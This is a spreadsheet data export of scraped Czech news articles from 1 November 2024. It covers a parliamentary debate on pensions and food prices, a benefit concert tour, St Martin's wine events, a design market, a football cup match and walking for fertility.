ministra, že když je špatné kydání hnoje, tak i slovo "vůl" by na půdě Sněmovny nemělo zaznít. Já jsem ale tady přišla s něčím jiným. Zaznělo tady - (Poslanci diskutují poblíž řečniště.) prosím vás, já se neslyším, pane předsedající, opravdu, neslyším se. Místopředseda PSP Aleš Juchelka : Já poprosím o klid v pravé i v levé části sálu. A samozřejmě, že mám faktickou poznámku nastavím časem. Prosím. Poslankyně Zuzana Ožanová : Děkuji vám. Tady se mluvilo, že jsme byli zváni - já nejsem členkou sociálního výboru, takže to nemohu posoudit - k jednání a podobně. Víte, mně se to za úsměvné, protože přestože se tady předkládají vládní návrhy zákonů, tak u mnoha zákonů je velké množství pozměňovacích návrhů z vládních dílen, takže my, když tu přijde nějaký návrh zákona, my vlastně ani nevíme, co koalice chce, protože v rámci druhého čtení takové extrémní množství pozměňovacích návrhů, které napíší ministerstva - a my nevíme, co z toho potom bude. Když vy něco dáte, vy to takzvaně prodiskutujete. Ale opravdu to prodiskutujete, když potom tady dáváte různé pozměňovací návrhy od těch profesí, podobně? Vždyť nikdy nevíte sami, co chcete - a nám říkáte: vy nechodíte na jednání na jednání, abyste nám řekli, co chcete vy. Prosím vás, napřed bych si to ujasnila sama u sebe, než začnu takhle kritizovat. Já potom budu se samozřejmě vyjadřovat (?) množství pozměňovacích návrhů a podobně, jak je mým zvykem, ale zkuste zvážit - co kdybyste tu dali jednou návrh, který by nevyžadoval (důrazně) desítky pozměňovacích návrhů, aby koalice byla spokojena? Děkuji za pozornost. Místopředseda PSP Aleš Juchelka : Já taktéž děkuji. V tuto chvíli je přihlášena paní kolegyně Balaštíková s faktickou poznámkou, poté Berenika Peštová a Hubert Lang . Prosím. Poslankyně Margita Balaštíková : Tak ještě jednou. Pane ministře Výborný , prostřednictvím pana předsedajícího. (Zvýšeným hlasem.) Role faráře by vám šla ohromně! Vy umíte (důrazně) tak otočit to, co člověk říká, že je málokdo schopen vám sekundovat. Já se na vás učím. Děkuju. Já jsem tady od cenotvorbě vůbec nehovořila. Já jsem hovořila o tom, (Zvýšeným hlasem.) jak kroky ministrů za KDU-ČSL změnou společné zemědělské politiky, odsouhlasením konsolidačního balíčku zvedly nákladovost u prvovýrobců, zpracovatelů a všech, i u obchodníků, a oni museli tyhlety náklady promítnout do ceny potravin. (Důrazně) Vy jste zvedl cenu potravin! A vy jste zvedl i cenu másla! Nikdo vám neříkal, abyste řekl, že mají obchodníci prodávat levněji. Mají tam zajímavou marži, ale já jsem hovořila (důrazně) o tom, co je náplní ministra zemědělství, a to je to, starat se o svůj resort (důrazně) tak, aby tam byla nákladovost nízká a aby tam byla konkurenceschopnos. A (důrazně) tu vy snižujete! To (důrazně) vy jste ten, který mířil na velké! (Z pléna: Psssst...) Původně jste si myslel: sestřelím Babiše. Potom (jste?) chtěl sestřelit další, protože to byli agrobaroni! A nakonec jste sestřelil ty střední, kteří jsou (zvýšeným hlasem) rádi, když si to ti velcí od nich koupí, protože chtějí, aby jejich zemědělské podniky dál fungovaly, aby tam lidé pracovali a aby tahle země byla soběstačná ve výrobě potravin! A to (důrazně) vy jste likvidátor toho všeho, máte na starosti venkov a posíláte ho do kolen! Tak to je! Tak si tady nenalévejme úplně jiné víno , protože, vážený pane ministře, ono vám v čistém vínu plavek kus korku! Místopředseda PSP Aleš Juchelka : Já děkuji za dodržení času u faktické poznámky. Berenka Peštová je další přihlášenou. Prosím. Poslankyně Berenika Peštová : Já děkuji za slovo. Já bych chtěla zareagovat na svoji předřečnici Zuzanou Ožanovou , prostřednictvím vás. No, ono je to zcela jednoduché, že jo. Jestli si vzpomínám, jestli si moje ctěná kolegyně vzpomíná, tak když jsme nastoupily sem do Poslanecké sněmovny , tak vzniklo nové kvazi ministerstvo, které mělo na starosti čistou legislativu, ne, aby čistá legislativa byla - která sem chodí do Poslanecké sněmovny - a očištěna tak, aby právě jsme nemuseli přijímat tolik pozměňovací návrhů. Kde máme pana ministra Šalomouna? (Ukazuje vpravo.) Zřejmě už čistotu nepotřebujeme, tak proto je tady tolik pozměňovací návrhů. Děkuji. Místopředseda PSP Aleš Juchelka : Já také děkuji za dodržení času. V tuto chvíli pan poslanec Hubert Lang , poté Aleš Dufek , Zuzana Ožanová a Miloslav Janulík . Vaše dvě minuty, prosím. Poslanec Hubert Lang : Děkuju, pane předsedající. Já bych se tedy vrátil ve své faktické - říkáte, abychom tady konstruktivně hovořili - tak mě napadla taková myšlenka, pane ministře Jurečko, tentokrát. Pozměňovacím návrhem, který tady jeden z nich je předkládaný od TOP 09 a ODS , což jsou vlastně vaši koaliční partneři, tak vypadlo ze třetí kategorie náročnosti více jak 100 000 lidí, kterým jste jaksi zamezili odejít do předčasné penze. My v souvislosti s jinými zákony - třeba, které se týkají vnitra - jsme tady tento týden probírali a bylo řečeno: jestliže - poslouchejte, občané - resortní ministr je proti nějakému návrhu, tak ve své podstatě všichni čtyřkoaliční poslanci musí hlasovat taky jakoby negativně. Anebo když je pro, tak musí hlasovat pro. A my jsme se tady dostali do situace, že pozměňovacím návrhem, který tady načetl pan Jakob, prostřednictvím pana předsedajícího, a pan Benda z ODS , a pan Jakob z TOP 09, tak vlastně překvapil vás jako koaliční partnery KDU-ČSL. Mě by tedy zajímalo - opravdu, jak říkala paní předsedkyně našeho klubu: jak tedy KDU-ČSL se k tomu postaví? Jestli tedy vy jako resortní ministr zaujmete negativní stanovisko, tak teoreticky tento pozměňovací návrh by neměl projít - podle vaší logiky, vlastně, čtyřkoalice! A ukazuje to opravdu na to, že tato vaše pseudoreforma není připravená, prostě vy to šijete horkou jehlou, šijete to na poslední chvíli, takhle zásadní věc, která by se měla dotýkat desítek, stovek tisíc lidí do budoucnosti. Strašíte tady společnost něčím, že nebude na penze - to jsme tady už tisíckrát říkali. Strašíte tady, rozdělujete, dáváte klín mezi seniory, kteří si zaslouží dožít v nějakém komfortním prostředí, a mezi mladou generací, říkáte pořád: bude se to dotýkat až lidí, kteří jsou v roce 1989 narození. Vy tady (důrazně) predikujete nějaké věci, které budou v roce 2050. Statistici a další odborníci vám říkají, že to je absolutní nesmysl. Ale zajímalo by mě tedy, jak budete hlasovat, pane - jak bude hlasovat čtyřkoalice, když vy jako resortní ministr jste zatím proti? Děkuji. Místopředseda PSP Aleš Juchelka : Já také děkuji za dodržení času. Pan předseda klubu KDU-ČSL Aleš Dufek . Vaše dvě minuty. Prosím. Poslanec Aleš Dufek : Já myslím, že pojďme dál. Zazněla silná slova nalevo, silná slova napravo, zazněla - bavíme se, že budeme poslouchat nějaké argumenty, má mluvit váš stínový ministr práce a sociálních věcí. Já se upřímně těším na jeho vystoupení, budu si dělat poznámky. Myslím, že je čas se posunout. Místopředseda PSP Aleš Juchelka : Já děkuji panu poslanci Dufkovi . V tuto chvíli Zuzana Ožanová ještě před panem poslancem Janulíkem s faktickou poznámkou. A ta už taktéž přichází a já jí zapínám její dvě minuty. Prosím. *** Minulý Nahoru Další</t>
  </si>
  <si>
    <t>11060</t>
  </si>
  <si>
    <t>20241101_341_3243007625_db405df04890b84e0d85.html</t>
  </si>
  <si>
    <t>db405df04890b84e0d85</t>
  </si>
  <si>
    <t>Hudba pomáhá opět vyrazí na koncertní šňůru. Pro nemocného Milánka z Litomyšle</t>
  </si>
  <si>
    <t>Hudba pomáhá opět vyrazí na koncertní šňůru. Pro nemocného Milánka z Litomyšle Benefiční projekt více než stočtyřicetihlavé party kamarádů se vydá na turné už 30. listopadu. Jako tradičně startují benefici v kostele v Morašicích u Litomyšle . O vstupenky je každý rok mela. Předprodej začal v pátek 1. listopadu v 10 hodin a během několika minut je většina vstupenek vyprodaných. Jako jedna z mála benefic dává Hudba pomáhá koncovému obdarovanému skutečně každou korunu ze zakoupené vstupenky. Před Vánoci se tak sousedé z regionu složí na zásadní životní dárek rodině z blízkého okolí. Vloni benefice pomohla Doležalovým ze Suché Lhoty u Litomyšle . Na konto handicapované Klárky odeslali pořadatelé 1 209 846 korun. Zprávy „Hudba dokáže věnovat dítku s handicapem nemalé finance, které nejsou narozdíl například od státních příspěvků nijak vázané. Jediným kritériem je opravdu efektivní pomoc. Při výběru toho, na co finanční prostředky poslouží, se tak s rodinami zpravidla dostáváme k věcem, které výrazně ovlivní jejich další fungování. A nejinak tomu bude i u Vopálkových,” sdělil ředitel festivalu Hudba pomáhá Karel Telecký. Pořadatelé pro letošní benefici vybrali rodinu Vopálkovu z Litomyšle . Ladě a Milanovi Vopálkovým se před pěti lety narodil malý Míla. Na první pohled to byl zdravý chlapeček. Ve dvou měsících si však rodiče všimli drobné tečky v jeho oku, která dala impulz k návštěvě lékaře. Série vyšetření vyústily v diagnózu rhizomelická chondrodysplazie. Jedná se o velmi vzácnou metabolickou vadu způsobenou kombinací genetických informací rodičů. U Míly vyvolává nejen šedý zákal, ale především neprospívání, opožděný motorický a mentální vývoj, zkrácení končetin a kloubní deformitu. Míla tak sám nechodí, nemluví a prakticky neustále potřebuje pomoc rodičů. Zvláštní kategorií je stravování, které může probíhat pouze ve speciálně upravené polohovací židličce a v pravidelných intervalech. play_fill Svitavsko „Je pro nás proto velmi komplikované opustit, byť jen na chvíli, domov. Nedělní návštěva babičky se stává náročným stěhováním polohovací židle, všech Mildových pomůcek a plánování několika stravovacích zastávek. Pohodové odpoledne se tak často míjí účinkem a my zůstáváme raději doma,” vyprávěla maminka Lada Vopálková. Právě s mobilitou chtějí pořadatelé Vopálkovým pomoci. Z výtěžku koncertů zaplatí rodině nové, speciálně upravené auto. „Auta se pomalu stávají naší specializací,” podotkl Telecký. V případě Vopálkových ale není auto jen transportním zařízením, jako spíše nástroj k cestě z domácí izolace. Okolo cest k babičce a jídla vystavěli muzikanti celý příběh letošního ročníku festivalu Hudba pomáhá. Podtitulem Od babičky ze špajzu zastřešili dramaturgii písňového večera, edici merchandisingu plného domácích produktů i nabídku barů. „Orchestr je natěšený. Večer okořeníme melodiemi, které si spojujeme s návštěvami u prarodičů. S pohodičkou, plným břichem, vlídností, láskyplnou péčí. Od Babičky, přes pohádkové motivy, zpívánkové lidovky až po stálice našeho repertoáru. A všichni se u toho nají,” přiblížila repertoár autorka hudebních aranží Martina Novotná. play_fill Volný čas V předsálím budou vždy vonět buchty. Obchůdek nabídne čokoládu, pivo a také novou edici ponožek. „Orchestrální úpravy písní vznikají Hudbě pomáhá na míru a představí je opět ansámbl muzikantů, ve kterém vedle sebe usedají dědečkové, mámy i děti. Jejich společný čas naplňuje hudba, která pomáhá,“ doplnila Magdaléna Rožková z pořadatelského týmu Hudby pomáhá. Koncerty, které v předvánočním čase každoročně navštíví na tři tisíce posluchačů, tradičně zamíří do divadel v Poličce (7. 12.), Litomyšli (14. 12.), Ústí nad Orlicí (21. 12.) a Vysokém Mýtě (25. 12.). Koncertní šňůra začíná 30. listopadu v domovské obci muzikantů v Morašicích . Před diváky usedne na jeviště více než padesát hráčů orchestru a vokalistů. Autor: Iveta Nádvorníková Autor Iveta Nádvorníková Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20241101_342_3264833978_67f74ac332b87d289d41.html</t>
  </si>
  <si>
    <t>67f74ac332b87d289d41</t>
  </si>
  <si>
    <t>Když je život příliš krátký na nudné debaty o počasí, pojďme se bavit o absurdních realitách</t>
  </si>
  <si>
    <t>Když je život příliš krátký na nudné debaty o počasí, pojďme se bavit o absurdních realitách autor: Redakce Nezdrave.cz | 01.11.2024 | Kecy Život ve velkoměstě je jako horská dráha, kterou nikdo neplatí, a my na ní všechny starosti házíme kamsi pod kola. Místo toho, abychom se věnovali plytkým drbům o počasí nebo sousedských činech, měli bychom se zaměřit na to, co nás opravdu zajímá. Město je plné absurdních situací a šíleností, které nás obklopují, a je na čase je vyzvednout na piedestal humorného zkoumání. Pozorujete to i vy? Všichni se tady tváří jako mistři světa marketingu, ale diskutují o tom, jaká je ideální teplota pro konzumaci cappuccina. Smysl pro humor jako nástroj přežití Každý den, když kráčíme hlučným městem, jsou naše reflekce často zastíněny spěchem a chaosem. Ale co kdybychom se pokusili uchopit situaci s nadhledem? Chcete se smát i těm nejjednodušším absurditám? Například věděli jste, že podle průzkumů se průměrný městský chlap nachází v depresi, pokud nezmáčkne na displeji svého telefonu alespoň dvanáctkrát za hodinu? Zní to absurdně, ale pro mnohé to představuje realitu. Mobilní zařízení se stává jakousi biblí moderní doby. A to přináší nezanedbatelnou zábavu, zvlášť když si uvědomíte, že nás vlastně kabelové vázání přetváří v malé roboty. Jakmile se dostanete do prostředí, kde je situace napjatá, vždy je tady šance na veselé osvěžení. Vzpomínáte si na večer, kdy jste se snažili udržet klid, zatímco váš kamarád se topil v cocktails drincích na střeše? Když došlo na křížové argumenty o tom, kdo měl pravdu ohledně nejnovějšího trendu v barberingových službách, muselo to vypadat docela absurdně. Ale věřte, tohle je přesně ono – právě v těchto momentech humor nejenom šetří naše nervy, ale také rozjasňuje atmosféru. Generace Yuppies vs. Boomers: Kdo se více baví? Mezi generacemi panují oddělené názory na to, jak a co je k smíchu. Zatímco yuppies si libují ve filozofických debatách o tom, jaký je smysl života, boomers obvykle zanechávají otázku “Proč se musím smát?” na milost výzvám moderní doby. Naši starší přátelé prosazují osvědčené recepty na zábavu, jako jsou asijské bufety a tajemství grilování, zatímco my se snažíme svrhnout konvence čelní krabice a určit, jak moc absurdní musí byť sklenice vína , aby vypadala cool. Ať už jste fanouškem pohybu nebo milovníkem klidného grilování, jedno je jisté – společné zážitky v městských džunglích nám poskytují neocenitelnou příležitost k povyražení. Jak byste se tedy cítili, kdyby vám někdo řekl, že součástí nutného životního balíčku k radosti je schopnost obklopit se přáteli, kteří mají smysl pro humor? Je to jako kdyby vás obsadili katolictí mniši a vy se následně rozhodli, že místo modlitby si devětkrát zapojíte do debaty o tom, jestli je veganismus pokrokem lidstva či jeho odsouzením do pekel. Každé setkání s přáteli, ať už jde o takzvaný malý talk nebo hluboké filozofování u piva , nás utvrzuje v tom, že humor je vlastně jakýmsi unikátem na trhu. Věření v to, že se musíme smát, je klíčem k tomu, jak žít život naplno. A tak, pokud vás někdo zítra přistihne s kloboukem v ruce u kávovaru, dokážete mu s úsměvem vysvětlit, že právě teď se tváříte jako vášnivý umělec na největší představení vašeho života, protože právě vy jste ti, kdo uzavírá osud zábavy. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_343_3264825480_ea61bdf1148a350fe602.html</t>
  </si>
  <si>
    <t>ea61bdf1148a350fe602</t>
  </si>
  <si>
    <t>SVATOMARTINSKÉ SAUNOVÁNÍ v pátek 8. listopadu</t>
  </si>
  <si>
    <t>SVATOMARTINSKÉ SAUNOVÁNÍ v pátek 8. listopadu Co je lepšího než se nechat hýčkat teplem sauny a k tomu si vychutnat lahodná svatomartinská vína ? Zveme vás na jedinečné SVATOMARTINSKÉ SAUNOVÁNÍ, kde se propojí příjemný relax s neobvyklým gurmánským zážitkem. Program: 16:30 – Ochutnávka svatomartinských vín Sommelier Martin Špráchal vám představí čtyři mladá svatomartinská vína z vinařství Šoman , která vynikají svěžestí a ovocnými tóny. 17:00 – 19:00 – Saunové ceremoniály Saunamistři Jirka a Ilona vás provedou speciálními ceremoniály plnými tepla, vůní a relaxace. Při ceremoniálech v 18:00 a 19:00 si opět vychutnáte víno . 20:00 – Peeling v parní kabině Ilona pro vás připravila vinný peeling, díky kterému ze sauny odejdete s hladkou a svěží pokožkou. Přijďte se zklidnit, zahřát a zároveň ochutnat, jak se letošní mladá vína povedla. Letos si můžete svatomartinské víno vychutnat už od pátku 8. listopadu, ani my tedy nebudeme čekat do pondělí 11.11. A pokud vám vína zachutnají, můžete si je zakoupit a odnést s sebou domů. Pro zajištění pohodlí si můžete rezervovat místo na ochutnávce, za malý poplatek vám rezervujeme volnou šatní skříňku. Ochutnávka bude probíhat v odpočívárně wellness. Oslavte svatého Martina stylově! Těší se na vás Hana Platenková a tým Saunového ráje Internet: www.saunovyraj.cz</t>
  </si>
  <si>
    <t>277</t>
  </si>
  <si>
    <t>20241101_344_3301630100_b00bef2fc6dea2e7bab0.html</t>
  </si>
  <si>
    <t>b00bef2fc6dea2e7bab0</t>
  </si>
  <si>
    <t>Lemarket – moderní tržiště</t>
  </si>
  <si>
    <t>Lemarket – moderní tržiště Moderní tržiště Lemarket se letos již pojedenácté vrací, aby představilo to nejlepší z české tvůrčí scény. O víkendech 7. - 8. prosince a 14. - 15. prosince 2024 zaplní přes 200 značek a umělců nově zrekonstruované prostory WPP Campus u stanice metra Vltavská. Tato ikonická budova, oceněná jako Stavba roku 2021, nabídne unikátní zázemí, do něhož běžně veřejnost nemá přístup. E-mail Popis akce Lemarket – moderní tržiště v prosinci nabídne během dvou víkendů přes 100 českých značek – pouze třetina vystavovatelů se opakuje, takže návštěvníci objeví vždy nové tvůrce jako Ententyky, Soolista či Perfumed Prague. Organizátorka Elena Janota zdůrazňuje bohatý doprovodný program s tetováním, profesionálním líčením a masážemi. Novinkou je prostor pro dobročinné projekty SPOLUŽIVOT, METRÁŽ a ELPIDA, tetovací salon, masáže Bioorganica a vánoční balení dárků. V kurátorské gastro zóně nechybí vína ALMA WINES, pekárna La Forme, káva Onesip Coffee, sladkosti Epifany či japonské speciality Neko Onigirazu. Kulturní program s moderátorem Šimonem Bilinou nabídne vystoupení Adama Vopičky, Sboru ELPIDA a dětského sboru HLÁSKY. Atmosféru večera doplní DJ set a benefiční divadelní představení na podporu charitativního projektu. Vstupenka na první víkend (7. 12.–8. 12.) 150–250 Kč Vstupenka na druhý víkend (14. 12.–15. 12.) 150–250 Kč Benefiční vstupenka na divadlo 1290 Kč Zdroj fotek: Lemarket – moderní tržiště Něco se může vždycky změnit a pořadatel nám to mohl zapomenout oznámit. Než vyrazíte, kontrola na oficiálních stránkách akce nikdy neuškodí. Jak se sem dostat Zadejte stanici, obec nebo adresu odkud pojedete pro vyhledání spojů ve vyhledávači IDOS . Podobné akce</t>
  </si>
  <si>
    <t>2.12</t>
  </si>
  <si>
    <t>20241101_345_3242764119_c4e20c4083a78dadb46d.html</t>
  </si>
  <si>
    <t>c4e20c4083a78dadb46d</t>
  </si>
  <si>
    <t>Liberec si odškrtli. Co dál? Hlučínští vyhlížejí návštěvu z Prahy</t>
  </si>
  <si>
    <t>Liberec si odškrtli. Co dál? Hlučínští vyhlížejí návštěvu z Prahy Jeho oblíbenou pivnici v Opavě spláchla povodeň. Tudíž v ní trenér fotbalistů Hlučína Lukáš Černín nemohl oslavit středeční pohárový postup přes Liberec . „Ale rád si dám pivo kdekoliv jinde,“ usmíval se po výhře 1:0. Hlučínští se podobně jako v roce 2022 přes Plzeň probili do osmifinále MOL Cupu, českého poháru, přes prvoligového protivníka. Kapitán hlučínských fotbalistů Radim Plesník se za běžícím Vojtěchem Walou raduje z výhry nad Libercem . | foto: Jiří Seidl, MF DNES „Nedělal bych z toho vědu. Podařilo se nám vyhrát jeden zápas s ligovým týmem. Ve fotbale jsem už nějaký pátek, něco už o něm vím,“ prohlásil Černín , který v první lize odehrál 45 utkání. Všechny za Opavu . Co vůbec Hlučínští o Liberci věděli? „Dívali jsme se na video, ale nebylo to nijak speciálnější oproti naší lize. Jak se soupeři jmenují, jsme věděli z televize,“ usmál se záložník Ondřej Moučka. „Porazili jsme kvalitního soupeře, ale teď na nás budou i tlaky. V sobotu hrajeme v Blansku , tam klidně můžeme prohrát,“ uvědomuje si Lukáš Černín . „Kluci budou mít nynější vítězství v hlavách, ale moje práce je, abych je uhlídal.“ Liberecký trenér Radoslav Kováč hlučínské fotbalisty chválil za obětavost a nasazení. A ocenil mladého útočníka Marka Havrana. „Podal excelentní výkon, měli jsme s ním problémy,“ řekl. „Hrál velmi dobře,“ souhlasil Lukáš Černín . „Marek přišel z devatenáctky. Ze začátku, než si zvykl, měl trochu problémy s mužskou kopanou, ale postupem času vše pochytil. Je tahounem. Stává se pro nás klíčovým hráčem.“ Černín dodal, že se ozval trenér reprezentace U19 a ptal se, jak Havran, který reprezentoval už v týmu sedmnáctiletých a v Hlučíně je na hostování z Baníku Ostrava , vypadá. „U nás je to jeho první kontakt s mužským fotbalem,“ řekl Černín . „Je to nějakých šest zápasů, co hraje v základní sestavě. Pracuje na sobě. Ukazuje, že by mohl být přínosem, ale ještě to je daleká cesta. Takových hráčů bývá spousta. Záleží na něm.“ Hlučínští jsou v moravskoslezské lize po třinácti kolech čtvrtí, přičemž na první Kroměříž a druhý Třinec ztrácejí třináct bodů. „Ambice máme pořád nejvyšší... “ uvedl Černín . „Jako vše i třetí ligu bychom rádi vyhráli, ale trochu nám uskočil začátek. Třinec a Kroměříž mají dobré týmy, skoro profi, my jsme amatéři, kluci chodí do práce anebo studují. Přesto cíle musejí být vždy ty nejvyšší.“ Další kolo čeká hlučínské fotbalisty až na jaře. Koho by si přáli? „Určitě někoho z Prahy , Slavii , nebo Spartu . Přeju si Spartu,“ odpověděl Ondřej Moučka. Liberecký útočník Ahmad Ghali (vlevo) a hlučínský obránce Vojtěch Kolaska se ženou za míčem. „Pohár asi těžko vyhrajeme, to bych byl velký optimista, ale pokud by naše cesta měla v příštím kole skončit, tak s tím nejzvučnějším soupeřem,“ řekl Černín . Takže? „Třeba Sparta , Slavia , Plzeň ... Je nám to jedno, ale ať to je zase nějaký sváteční den, pokud bychom hráli na domácím hřišti.“ Kč Autor: Jiří Seidl Autor Jiří Seidl</t>
  </si>
  <si>
    <t>20241101_346_3243663240_04ad21e74001800a73ed.html</t>
  </si>
  <si>
    <t>04ad21e74001800a73ed</t>
  </si>
  <si>
    <t>Svatý Martin v Uherském Hradišti znovu požehná letošním mladým vínům</t>
  </si>
  <si>
    <t>Svatý Martin v Uherském Hradišti znovu požehná letošním mladým vínům 1. listopadu 2024 9:52 ilustrační snímek | foto: Metro.cz Svatý Martin posedmnácté požehná na Masarykově náměstí v Uherském Hradišti mladým vínům. Na bílém koni dorazí a láhev nového svatomartinského vína otevře v pondělí 11. listopadu. V programu neschází ani obvyklá ochutnávka svatomartinských a mladých vín nebo folklorní program, sdělila dnes ČTK Lucie Holásková ze spolupořádajícího sdružení pro rozvoj cestovního ruchu Region Slovácko . Svatý Martin přijede na Masarykovo náměstí v 11:11 za zvuku kostelních zvonů, aby předal knězi letošní víno k požehnání. "Symbolický akt dodá celé události duchovní rozměr a připomene legendu o svatém Martinovi a jeho plášti, která vždy přiláká stovky přihlížejících," uvedla Holásková. Následovat bude degustace vína od vinařů z regionu. K ochutnání bude připraveno více než 50 vzorků svatomartinských a mladých vín. Zastoupeny mezi nimi budou odrůdy Müller Thurgau, Muškát moravský, Veltlínské červené rané, Svatovavřinecké, Modrý Portugal a Zweigeltrebe v rosé i červené variantě. Mezi mladými víny se podle pořadatelů objeví méně známé odrůdy jako Solaris a Saphira, v nabídce bude i mladé Chardonnay, Sauvignon nebo Irsai. Letošní vinařskou sezona ovlivnily jarní mrazy, kdy část vinic pomrzla. "Nebyla ušetřena ani Slovácká podoblast. Díky horkému, ale suchému létu se vinice částečně zregenerovaly a tak letošní úroda je na 60 až 70 procentech běžného roku. Co se týče kvality hroznů, tak ty díky letním vysokým teplotám dozrály do cukernatosti pozdní sběr. Mladá vína ročníku 2024 se jeví zatím velmi svěží a ovocná, ale na výsledek si budeme muset počkat do jara 2025," řekl Ivo Kaňovský ze Zámeckého vinařství Bzenec , který se akce účastní. Kromě vína bude pro návštěvníky připraveno občerstvení v podobě husího a kachního masa v různých úpravách, chleba s husí paštikou a tradičních svatomartinských rohlíčků. V chystané nabídce neschází ani káva nebo pivo . Lidé se mohou těšit také na bohatý folklorní program a cimbálovou muziku. Žehnání svatomartinského vína se ve městě koná od roku 2007. "Žehnání svatomartinských vín je pro nás nejen oslavou vína samotného, ale také příležitostí ukázat bohatství naší kultury a tradic. Velmi si vážím poctivé práce místních vinařů a jsem si jistý, že i letos nám mají co nabídnout," řekl předseda správní rady Regionu Slovácko a uherskohradišťský starosta Stanislav Blaha ( ODS ). Víno z nové úrody se na svatého Martina , patrona vinařů, oficiálně uvádí do prodeje. Letos by ale mělo být k dostání už o víkendu 9. a 10. listopadu. Značka Svatomartinské víno byla v České republice zaregistrovaná v roce 1995. Po splnění kritérií určených Vinařským fondem a degustační komisí ji mohou užívat vinaři registrovaní v ČR. Kolik druhů Svatomartinského letos odborná komise k prodeji vybrala a kolik lahví pod značkou Svatomartinské půjde na trh, zveřejní fond příští týden. Loni šlo na trh rekordních 2,78 milionu lahví. Autor: ČTK Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20241101_347_3242768309_a9e14e1cfa9f502df07c.html</t>
  </si>
  <si>
    <t>a9e14e1cfa9f502df07c</t>
  </si>
  <si>
    <t>Vliv chůze na plodnost? Pravidelnou procházku ocení pánevní dno i psychika, napomáhá také ke kvalitnějším spermiím</t>
  </si>
  <si>
    <t>Vliv chůze na plodnost? Pravidelnou procházku ocení pánevní dno i psychika, napomáhá také ke kvalitnějším spermiím Chůze je velmi účinnou formou pohybu, která přináší celou řadu zdravotních benefitů. Nejde jen o prostředek ke zhubnutí nebo zlepšení kondice, pravidelná chůze může mít také překvapivé účinky na plodnost. Víte, jak pohyb ovlivňuje kvalitu spermií? Jaký vliv má chůze na psychiku? A jak působí na svalstvo v oblasti pánve? Chůze dostane spermie do kondice Pokud chtějí muži zlepšit kvalitu spermií, měli by vedle úpravy stravy, omezení konzumace alkoholu , kofeinu a nikotinu zařadit rovněž pravidelný pohyb. Svižná chůze je aktivita, kterou si může dovolit zařadit do svého denního režimu téměř každý. Je vhodná i pro ty, kteří s pravidelným pohybem teprve začínají nebo třeba trpí obezitou. Ideální je věnovat se jí třikrát až čtyřikrát týdně po dobu 45 minut, a to v tempu, při němž se člověk zadýchá. „ Bylo dokázáno, že přiměřená fyzická aktivita podporuje tvorbu testosteronu. A čím více testosteronu muž v těle má, tím více spermií produkuje. Zároveň se zlepšuje také jejich pohyblivost. Pravidelná svižná chůze tedy může pomoci udržet spermie v kondici,“ vysvětluje IVF specialista MUDr. Martin Maděrka, Ph.D., vedoucí lékař z kliniky REPROMEDA . Pravidelnou procházkou ke klidnější mysli Stres. Stále častěji zmiňovaný faktor neplodnosti, který tím, že zasahuje do širokého spektra procesů v těle, dovede početí blokovat. Jeho působením se totiž vyplavuje hormon stresu kortizol a hormon adrenalin, což v krátkodobých krizových situacích může napomoci podat co nejlepší výkon. Je to přesně ten stres, který člověk pociťuje například před zkouškou nebo třeba sportovním utkáním. Při dlouhodobém působení však může stres narušit hormonální rovnováhu a blokovat ovulaci. Negativně působí též na tvorbu testosteronu a kvalitu spermií. Pokud se často cítíte pod tlakem, zařaďte do své rutiny pravidelnou svižnou procházku, nejlépe v přírodě. Během tohoto pohybu totiž dochází k vyplavování endorfinů, které prokazatelně zlepšují náladu a stres zmírňují. Pravidelná rychlá chůze tak pomůže s odbouráváním úzkosti, zvyšuje odolnost proti stresu, a navíc přispívá k lepšímu spánku. To vše pak ve výsledku pozitivně ovlivňuje samotnou plodnost. Chůze pomáhá správné poloze pánve Každodenní procházky mají vedle pozitivních dopadů na redukci váhy nebo psychické rozpoložení významný vliv na zlepšení držení těla a zpevnění svalstva. To se projeví nejen po estetické stránce, ale také na plodnosti. „Špatné držení těla totiž může například způsobovat či prohlubovat nesprávnou polohu pánve. Její asymetrické postavení pak může nerovnoměrně zatěžovat svaly dna pánevního, jeho vazy a také negativně ovlivňovat prokrvení reprodukčních orgánů,“ říká MUDr. Martin Maděrka . Chůze přirozeně posiluje zádové a břišní svaly, stejně jako zmiňované svaly pánevního dna. Ty jsou velmi důležité, jelikož poskytují oporu děloze, vaječníkům a vejcovodům. Pokud jsou svaly oslabené, může docházet k poklesu těchto orgánů, což může narušovat správné prokrvení. Nemluvě o tom, že správně posílené svalstvo pánevního dna může pomoci předcházet nechtěným únikům moči v těhotenství a přispěje i k hladšímu průběhu porodu. Chůzí proti obezitě Za zásadní faktor neplodnosti odborníci v posledních letech považují obezitu – stav, kdy index tělesné hmotnosti BMI přesáhne hodnotu 30. „Podle aktuálních statistik je obézní přibližně pětina Čechů. Obezita přitom v těle vytváří stav permanentního zánětu, podporuje vysoký krevní tlak nebo rozvoj cukrovky. Mění také kvalitu DNA reprodukčních buněk a negativně ovlivňuje hormony,“ uvádí lékař. „Pokud obézní žena otěhotní, je pro ni těhotenství rizikovější a rovněž u jejího potomka může po celý život hrozit zvýšené riziko obezity, cukrovky nebo kardiovaskulárních onemocnění,“ dodává. Jako nejlepší prostředek pro redukci váhy přitom Světová zdravotnická organizace ( WHO ) doporučuje právě pravidelnou chůzi. Platí to ovšem v případě, že je prováděna nejlépe po dobu 45 minut a v určité intenzitě: aby se člověk zadýchal tak, že ještě během chůze zvládne mluvit, ale již ne zpívat. Tags: zdraví Autor: Life4you.cz - redakce Rubrika transition_slide ZDRAVÍ</t>
  </si>
  <si>
    <t>20241101_348_3242743593_ed6cd3600c2d6ddb9461.html</t>
  </si>
  <si>
    <t>ed6cd3600c2d6ddb9461</t>
  </si>
  <si>
    <t>„Ještě horší, než si myslíte.“ Bývalý policista začal mluvit</t>
  </si>
  <si>
